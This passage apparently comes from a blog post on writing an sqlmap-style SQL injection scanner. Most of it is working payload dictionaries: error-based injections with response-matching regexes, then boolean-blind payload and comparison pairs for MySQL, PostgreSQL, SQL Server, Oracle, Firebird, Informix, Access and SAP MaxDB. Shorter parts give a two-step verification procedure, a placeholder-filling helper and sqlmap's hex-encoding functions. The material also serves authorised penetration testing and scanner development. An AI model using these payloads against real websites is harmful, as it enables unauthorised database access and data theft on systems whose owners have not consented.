         'payload': " PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)"},
    'INJPAY_34':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))"},
    'INJPAY_35':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))"},
    'INJPAY_36':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))"},
    'INJPAY_37':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"},
    'INJPAY_12':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)"},
    'INJPAY_13':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)"},
    'INJPAY_10':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])"},
    'INJPAY_11':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])"},
    'INJPAY_16':
        {'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)"},
    'INJPAY_17':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))"},
    'INJPAY_14':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)"},
    'INJPAY_15':
        {'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)"},
    'INJPAY_18':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))"},
    'INJPAY_19':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))"},
    'INJPAY_52':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)"},
    'INJPAY_56':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)"},
    'INJPAY_57':
        {'dbms': 'Firebird', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))"},
    'INJPAY_54':
        {'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))"},
    'INJPAY_0':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))"},
    'INJPAY_1':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))"},
    'INJPAY_2':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))"},
    'INJPAY_3':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))"},
    'INJPAY_4':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))"},
    'INJPAY_5':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))"},
    'INJPAY_6':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"},
    'INJPAY_7':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"},
    'INJPAY_8':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))"},
    'INJPAY_9':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))"},
    'INJPAY_53':
        {'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))"},
    'INJPAY_49':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"},
    'INJPAY_48':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))))x)"},
    'INJPAY_45':
        {'dbms': 'Firebird', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))"},
    'INJPAY_44':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)"},
    'INJPAY_47':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)))s)"},
    'INJPAY_46':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x)"},
    'INJPAY_41':
        {'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))"},
    'INJPAY_40':
        {'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))"},
    'INJPAY_43':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')"},
    'INJPAY_42':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))"}

}

Loading and verification happen in two steps:

  1. url + prefix + level1_payloads + suffix; send the request; judge the result against sql_errors
  2. url + prefix + a payload from error_base_injection + suffix; send the request; if the grep pattern of that error_base_injection entry matches the response, that proves injection for the dbms the entry lists
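Added example (not the post's code, nor Langzi_SQL_INJECTION's): the verification half of step 2. It fills the RANDNUM/DELIMITER placeholders listed in the comment block above with values generated per scan, turns the grep template into a regex, and pulls the echoed result out of a constructed response body; the last call shows why fixed delimiters would produce false positives on ordinary markup. `make_context`, `fill_placeholders`, `grep_result` and `demo_response` are my names, and the error page is constructed.

```python
import random
import re
import string

# Same shape as the 'grep' entries of error_base_injection above
GREP_TEMPLATE = "[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]"


def make_context(seed=None):
    """Generate the placeholder values listed in the comment block above:
    one random number, its +1..+5 neighbours and two random delimiter strings
    (letters only, so they are harmless inside a regex and an SQL string literal)."""
    rng = random.Random(seed)
    num = rng.randint(1000, 9999)
    ctx = {"RANDNUM": str(num)}
    for i in range(1, 6):
        ctx["RANDNUM%d" % i] = str(num + i)
    for name in ("DELIMITER_START", "DELIMITER_STOP"):
        ctx[name] = "".join(rng.choice(string.ascii_lowercase) for _ in range(4))
    return ctx


def fill_placeholders(template, ctx):
    """Replace every [NAME] with ctx[NAME]; an unknown name is left untouched,
    so a misspelt placeholder stays visible instead of silently vanishing."""
    return re.sub(r"\[([A-Z0-9_]+)\]", lambda m: ctx.get(m.group(1), m.group(0)), template)


def grep_result(body, ctx, grep_template=GREP_TEMPLATE):
    """Return the text the database echoed between the two delimiters, else None.
    Context values are regex-escaped before the pattern is built."""
    safe_ctx = {k: re.escape(v) for k, v in ctx.items()}
    pattern = fill_placeholders(grep_template, safe_ctx)
    m = re.search(pattern, body, re.DOTALL)
    return m.group("result") if m else None


def demo_response(ctx):
    """Constructed error page in the shape an XPath-function error takes when the
    delimiters and the CASE result (1) are echoed back."""
    return "XPATH syntax error: '\\%s1%s'" % (ctx["DELIMITER_START"], ctx["DELIMITER_STOP"])


if __name__ == "__main__":
    ctx = make_context(7)
    print(fill_placeholders("[RANDNUM]=[RANDNUM1]", ctx))
    print(grep_result(demo_response(ctx), ctx))        # 1
    print(grep_result("<p>nothing here</p>", ctx))     # None
    # A fixed, common delimiter pair would match ordinary markup
    print(grep_result("<html>", {"DELIMITER_START": "<", "DELIMITER_STOP": ">"}))  # html
```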

Reading the source shows that sqlmap encodes the parameters it sends; this takes three functions and one default-encoding setting.

import binascii

UNICODE_ENCODING = "utf8"


# Encoding of the injected parameter string (Python 2: `unicode` is the text type)

def unicodeencode(value, encoding=None):
    """
    Returns 8-bit string representation of the supplied unicode value

    >>> unicodeencode(u'foobar')
    'foobar'
    """

    retVal = value
    if isinstance(value, unicode):
        try:
            retVal = value.encode(encoding or UNICODE_ENCODING)
        except UnicodeEncodeError:
            retVal = value.encode(UNICODE_ENCODING, "replace")
    return retVal


def utf8encode(value):
    """
    Returns 8-bit string representation of the supplied UTF-8 value

    >>> utf8encode(u'foobar')
    'foobar'
    """

    return unicodeencode(value, "utf-8")


def escaper(value):
    retVal = None
    try:
        retVal = "0x%s" % binascii.hexlify(value)
    except UnicodeEncodeError:
        retVal = "CONVERT(0x%s USING utf8)" % "".join("%.2x" % ord(_) for _ in utf8encode(value))
    return retVal

Boolean-blind type

The third step loads the blind-injection payloads, which are likewise collected in a dict.

'''
Positive request = payload, negative request = comparsion
url1 stands for ?id=1
url2 stands for ?id=-100

With url1 (the original page is itself a "true" page):
    LEVEL 1: positive request equals the original page, differs from the error page, differs from the negative request; negative request differs from the original page and may equal the error page (it will when a WAF is present) --> injection exists
    LEVEL 2: positive request differs from the original page, may differ from the error page, differs from the negative request; negative request equals the original page and differs from the error page (equals it when a WAF is present)
    LEVEL 3: positive request equals the original page, differs from the error page, differs from the negative request; negative request differs from the original page and may equal the error page (it will when a WAF is present)

With url2 (the original page is itself a "false" page):
never mind this case for now
    LEVEL 1: positive request equals the original page, may differ from the error page (equals it when a WAF is present), equals the negative request; negative request differs from the original page and may equal the error page

RANDNUM    # random number
ORIGVALUE  # the value of id in the url
RANDNUM1   # random number + 1
RANDSTR    # random letters
RANDNUM2   # random number + 2

'''
bool_blind_injection = {

    "INJPAY_27":
        {
            'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'dbms': 'Microsoft SQL Server',
            'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'level': '3'},
    "INJPAY_26":
        {
            'comparsion': ' and (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)',
            'dbms': 'PostgreSQL',
            'payload': ' and (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)',
            'level': '3'},
    "INJPAY_25":
        {
            'comparsion': ' and (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)',
            'dbms': 'PostgreSQL',
            'payload': ' and (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)',
            'level': '3'},
    "INJPAY_24":
        {'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))',
         'dbms': 'PostgreSQL',
         'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))',
         'level': '3'},
    "INJPAY_23":
        {'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))',
         'dbms': 'PostgreSQL',
         'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))',
         'level': '3'},
    "INJPAY_22":
        {'comparsion': ' and ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]', 'dbms': 'MySQL',
         'payload': ' and ([RANDNUM]=[RANDNUM])*[ORIGVALUE]', 'level': '3'},
    "INJPAY_21":
        {'comparsion': ' and ([RANDNUM]=[RANDNUM1])*[RANDNUM1]', 'dbms': 'MySQL',
         'payload': ' and ([RANDNUM]=[RANDNUM])*[RANDNUM1]', 'level': '3'},
    "INJPAY_20":
        {'comparsion': ' and ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])', 'dbms': 'MySQL',
         'payload': ' and ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])', 'level': '3'},
    "INJPAY_50":
        {'comparsion': ' HAVING [RANDNUM]=[RANDNUM1]', 'dbms': 'MySQL', 'payload': ' HAVING [RANDNUM]=[RANDNUM]',
         'level': '1'},
    "INJPAY_29":
        {
            'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'dbms': 'Oracle',
            'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'level': '3'},
    "INJPAY_28":
        {
            'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'dbms': 'Microsoft SQL Server',
            'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'level': '3'},
    "INJPAY_51":
        {
            'comparsion': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)',
            'dbms': 'MySQL',
            'payload': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)',
            'level': '1'},
    "INJPAY_38":
        {
            'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
            'dbms': 'MySQL',
            'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
            'level': '1'},
    "INJPAY_39":
        {'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))',
         'dbms': 'PostgreSQL', 'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))',
         'level': '1'},
    "INJPAY_55":
        {
            'comparsion': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)',
            'dbms': 'Microsoft SQL Server',
            'payload': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)',
            'level': '1'},
    "INJPAY_58":
        {'comparsion': ' ;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END', 'dbms': 'SAP MaxDB',
         'payload': ' ;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END', 'level': '1'},
    "INJPAY_30":
        {
            'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'dbms': 'Oracle',
            'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'level': '3'},
    "INJPAY_31":
        {
            'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)',
            'dbms': 'Informix',
            'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)',
            'level': '3'},
    "INJPAY_32":
        {
            'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)',
            'dbms': 'Informix',
            'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)',
            'level': '3'},
    "INJPAY_33":
        {'comparsion': ' and IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)', 'dbms': 'Microsoft Access',
         'payload': ' and IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0)', 'level': '3'},
    "INJPAY_34":
        {'comparsion': ' and IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)', 'dbms': 'Microsoft Access',
         'payload': ' and IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)', 'level': '3'},
    "INJPAY_35":
        {
            'comparsion': ' and (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)',
            'dbms': 'MySQL',
            'payload': ' and (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)',
            'level': '3'},
    "INJPAY_36":
        {
            'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
            'dbms': 'MySQL',
            'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
            'level': '1'},
    "INJPAY_37":
        {
            'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
            'dbms': 'MySQL',
            'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))',
            'level': '1'},
    "INJPAY_12":
        {'comparsion': ' OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]', 'dbms': 'MySQL',
         'payload': ' OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]', 'level': '2'},
    "INJPAY_13":
        {
            'comparsion': " AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL",
            'dbms': 'PostgreSQL',
            'payload': " AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL",
            'level': '1'},
    "INJPAY_10":
        {'comparsion': ' OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
         'payload': ' OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '2'},
    "INJPAY_11":
        {'comparsion': ' AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]', 'dbms': 'MySQL',
